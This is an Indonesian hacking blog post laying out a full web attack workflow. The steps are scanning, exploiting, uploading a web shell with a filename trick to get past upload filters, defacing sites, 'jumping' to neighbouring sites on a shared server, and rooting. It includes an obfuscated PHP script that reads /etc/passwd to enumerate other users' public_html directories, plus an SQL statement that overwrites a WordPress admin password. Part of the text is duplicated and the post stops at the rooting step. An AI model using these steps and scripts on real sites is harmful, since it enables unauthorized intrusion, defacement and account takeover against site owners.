Alur Web Attack
Alur Web Attack
Gambaran Web Attack :
Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting
1. Scan
Cari tau dimana letak kelemahan web target. Bisa di scan pake beberapa tool scanner. Diantar'a yang paling terkenal :
# Acunetix (Windows)
# Nikto (Linux)
Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.
2. XPL/SQLi
Setelah kita dapat menemukan data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Di bawah ini daftar situs yang menyediakan macam-macam Exploit :
# Exploit Database
# Packet Storm
# Inj3ct0r
# Hack0wn
Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang di gunakan web target. Karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhan'a. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
Kalau teknik SQLi dapat di lihat disini :
Ebook beserta sourc website untuk praktek teknik SQLi donlot disini
3. Upload Shell
Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman admin. Tinggal kita upload shell'a sekarang ;
- Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shell'a.
- Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
- Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shell'a di rename menjadi shell.php.jpg lalu upload.
Setelah shell berhasil di upload tinggal panggil letak URL shell'a dimana.
4. Deface or Jumping
Kalau pengen gaya-gaya an (Deface), cari file index.php lalu rubah file di dalam'a dengan script Deface yang kita punya. Bagi yang malas bikin scrip deface dapat menggunakan tool ; DefaceMaker. Coba arshive kan website yang sudah kita deface di situs :
- Indonesian Defacer
- Magelang Cyber
- Zona-H
Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Cara'a ?
Script jumping ;
Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting
1. Scan
Cari tau dimana letak kelemahan web target. Bisa di scan pake beberapa tool scanner. Diantar'a yang paling terkenal :
# Acunetix (Windows)
# Nikto (Linux)
Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.
2. XPL/SQLi
Setelah kita dapat menemukan data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Di bawah ini daftar situs yang menyediakan macam-macam Exploit :
# Exploit Database
# Packet Storm
# Inj3ct0r
# Hack0wn
Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang di gunakan web target. Karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhan'a. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
Kalau teknik SQLi dapat di lihat disini :
Ebook beserta sourc website untuk praktek teknik SQLi donlot disini
3. Upload Shell
Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman admin. Tinggal kita upload shell'a sekarang ;
- Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shell'a.
- Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
- Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shell'a di rename menjadi shell.php.jpg lalu upload.
Setelah shell berhasil di upload tinggal panggil letak URL shell'a dimana.
4. Deface or Jumping
Kalau pengen gaya-gaya an (Deface), cari file index.php lalu rubah file di dalam'a dengan script Deface yang kita punya. Bagi yang malas bikin scrip deface dapat menggunakan tool ; DefaceMaker. Coba arshive kan website yang sudah kita deface di situs :
- Indonesian Defacer
- Magelang Cyber
- Zona-H
Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Cara'a ?
Script jumping ;
<?
$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";
?>
- Upload script jumping'a
- Rename jadi jumpingfinder.php
- Panggil letak URL file tersebut
- Masuk ke public_html web target
- Masuk ke MySQL'a (cari acount MySQL di file config)
- Cari table user
- Update Password user admin
Dibawah ini ada script khusus untuk update user password admin :
UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;
5. Rooting

About: jefri
You may also like...
Langganan:
Posting Komentar (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
Oke, untuk yang belum tau aja yhaa... ^^ Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckck...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Gambaran Web Attack : Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting 1. Scan Cari tau dimana letak kel...
-
Mengapa judulnya kayak gini, iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam k...
-
Menghubungi pacar maupun gebetan via SMS atau Messenger saat ini sedang marak. Komunikasi memang penting untuk bisa menunjang kemajuan ...
-
Pengertian sql injection: SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi per...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)

Tidak ada komentar:
Posting Komentar